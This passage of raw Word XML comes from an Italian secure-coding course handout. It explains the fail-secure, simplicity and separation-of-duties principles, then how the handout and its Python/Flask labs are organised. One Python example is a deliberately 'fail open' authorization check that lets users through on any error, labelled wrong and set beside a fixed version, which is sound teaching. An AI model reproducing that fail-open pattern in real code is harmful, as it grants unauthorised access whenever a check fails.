    <w:bookmarkStart w:id="78" w:name="Xcf9034eace209f6f95a897936a0a6a4ec93aed7"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Principio 3 —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Fail Secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Fallire in sicurezza)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quando qualcosa va storto — un errore inaspettato, una condizione non prevista, una connessione che cade — il sistema deve fallire</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">chiudendosi</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, non aprendosi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Analogia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">I tornelli di accesso a un’area riservata, in caso di mancanza di corrente, devono restare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">bloccati</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Non aprirsi. È controintuitivo per chi non ci ha mai riflettuto: in caso di emergenza istintivamente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">lasciare passare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">sembra la scelta gentile. In sicurezza è la scelta che svuota l’edificio dei suoi beni. (In ambito antincendio la logica è opposta — le porte di emergenza devono aprirsi — ma lì il bene da proteggere sono le persone, non i beni materiali. La regola</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">fail secure</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">si applica al contesto: chiediti sempre cosa succede se le cose vanno storte, e progetta perché vadano storte nel modo meno dannoso.)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio software.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Un controllo di autorizzazione che, in caso di errore imprevisto, lascia passare l’utente è disastroso:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># SBAGLIATO — fail open (in caso di errore, lascia passare)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    autorizzato </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> controlla_permessi(utente, risorsa)</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autorizzato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se qualcosa va storto, lascia entrare. Disastro.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># GIUSTO — fail secure (in caso di errore, blocca)</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">try</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">:</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    autorizzato </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> controlla_permessi(utente, risorsa)</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autorizzato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se qualcosa va storto, blocca.</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    log.error(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="StringTok"/>
        </w:rPr>
        <w:t xml:space="preserve">"Errore nel controllo permessi"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">, exc_info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VariableTok"/>
        </w:rPr>
        <w:t xml:space="preserve">True</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Quel</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">True</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">nella prima versione è successo davvero, in produzione, più volte di quanto vorresti credere. Sembra una svista impossibile, ma nasce da una mentalità diffusa:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">se qualcosa non funziona, non bloccare l’utente</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. In sicurezza, è esattamente il contrario.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="78"/>
    <w:bookmarkStart w:id="79" w:name="Xe1079abdeaeb7aa37194d9eb69cc946823add7d"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Principio 4 —</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Keep It Simple</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(Semplicità prima di tutto)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">La complessità è il nemico della sicurezza.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Più è intricata la logica di un controllo, più è probabile che contenga un errore. Un controllo che chiunque legge in cinque secondi e capisce è anche un controllo che è difficile rompere senza accorgersene. Un controllo lungo, annidato, pieno di eccezioni, è una zona dove le falle si nascondono indisturbate.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Confronta queste due versioni dello stesso controllo:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Complicato — devi rileggerlo tre volte per essere sicuro che faccia ciò che pensi</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> (utente.ruolo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> RUOLI_AMMESSI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utente.is_super) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utente.is_sospeso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   (risorsa.pubblica </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> risorsa.proprietario_id </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">==</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utente.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">or</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    utente.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="BuiltInTok"/>
        </w:rPr>
        <w:t xml:space="preserve">id</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">in</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> risorsa.condivisa_con) </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">and</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="OperatorTok"/>
        </w:rPr>
        <w:t xml:space="preserve">\</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">   richiesta.metodo </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    procedi()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
        </w:rPr>
        <w:t xml:space="preserve"># Semplice — capisci subito cosa fa</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">if</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="KeywordTok"/>
        </w:rPr>
        <w:t xml:space="preserve">not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> utente_puo_accedere(utente, risorsa):</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="ControlFlowTok"/>
        </w:rPr>
        <w:t xml:space="preserve">raise</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve"> Forbidden()</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
        </w:rPr>
        <w:t xml:space="preserve">procedi()</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La logica è dentro la funzione</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">utente_puo_accedere()</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, separata, testata in isolamento, documentata. Quando arriverà il bug — e arriverà — saprai dove cercarlo, e una correzione in un punto solo sistemerà tutti i posti che usano quella funzione.</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="79"/>
    <w:bookmarkStart w:id="80" w:name="X0f1bcbc3fcaec6cf13cb1b5ed5cf855eee35bfb"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Principio 5 — Separazione dei compiti (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">Separation of Duties</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Lo stesso utente, o lo stesso componente software, non dovrebbe avere il controllo completo di un flusso critico dall’inizio alla fine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Analogia.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">In azienda, chi emette una fattura non è la stessa persona che la approva e la paga. Se lo fosse, potrebbe inventare fatture false e auto-pagarsi senza che nessuno se ne accorga. Per la stessa ragione, nelle banche, due chiavi diverse — in mano a due persone diverse — sono necessarie per aprire certi caveau.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio software.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Il processo che genera i report mensili non dovrebbe avere anche il permesso di modificare i dati dei clienti: se viene compromesso, può al massimo leggere, non manipolare. L’account di servizio che effettua i backup non dovrebbe avere il permesso di</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">cancellare</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">i backup precedenti: altrimenti un</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:iCs/>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">ransomware</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">(un programma che cifra i dati e chiede un riscatto) che riuscisse a impossessarsi delle credenziali di backup eliminerebbe anche le copie di sicurezza, lasciando l’azienda senza alternative.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="80"/>
    <w:bookmarkEnd w:id="81"/>
    <w:bookmarkStart w:id="82" w:name="come-usare-questa-dispensa"/>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="458" w:name="sec_1_5"/>
      <w:r>
        <w:t xml:space="preserve">1.5 Come usare questa dispensa</w:t>
      </w:r>
      <w:bookmarkEnd w:id="458"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">La dispensa è organizzata per essere letta in ordine, ma ogni capitolo apre con un riquadro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa devi sapere prima</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">”</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che ti dice quali capitoli precedenti — e quali concetti dei corsi paralleli (programmazione, basi di dati, reti) — devi aver già visto. Se ti manca un prerequisito, torna indietro o aspetta di averlo visto a lezione: forzare la lettura va a discapito della comprensione e ti lascerà con l’impressione di non aver capito nulla, quando invece il problema è solo l’ordine.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Struttura tipica di un capitolo tecnico (capitoli 5–10):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Analogia</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">del mondo reale per fissare l’idea centrale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Cosa va storto:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">il problema in termini semplici.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Esempio guidato passo-passo:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">cosa fa l’attaccante, cosa vede il sistema, perché funziona.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Codice vulnerabile e codice sicuro</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">a confronto, con spiegazione riga per riga.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Difese aggiuntive</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">in profondità: cosa mettere oltre alla correzione principale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Errori comuni</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">che vengono fatti anche da chi pensa di aver capito.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Laboratorio:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">l’esercizio pratico (un attacco da lanciare, una correzione da applicare e verificare).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1024"/>
        </w:numPr>
        <w:pStyle w:val="Compact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Checklist operativa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: il riassunto in punti che puoi tenere accanto mentre scrivi codice.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Linguaggio e strumenti del corso.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tutti gli esempi di codice e tutti i laboratori useranno</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Python</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">con il framework web</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Flask</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. La scelta è dettata dalla semplicità: Python è leggibile anche da chi non ha mai programmato, Flask permette di avere un’applicazione web funzionante in poche decine di righe. Le idee che impari qui valgono identiche in qualsiasi altro linguaggio (Java, C#, JavaScript, Go, PHP) — i bug di sicurezza non sono un problema di linguaggio, sono un problema di pensiero. Cambia la sintassi, ma l’errore concettuale è lo stesso.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Framework</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">= un insieme di librerie e convenzioni che ti fornisce gratuitamente le parti più ripetitive di un’applicazione (gestione delle richieste HTTP, indirizzamento delle pagine, connessione al database) così che tu possa concentrarti sulla logica specifica del tuo progetto. Flask è uno dei framework web Python più diffusi, particolarmente adatto alla didattica perché è minimale.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">L’editor.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Tutti gli esempi sono pensati per essere scritti e provati in</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:bCs/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Visual Studio Code</w:t>
      </w:r>
      <w:r>
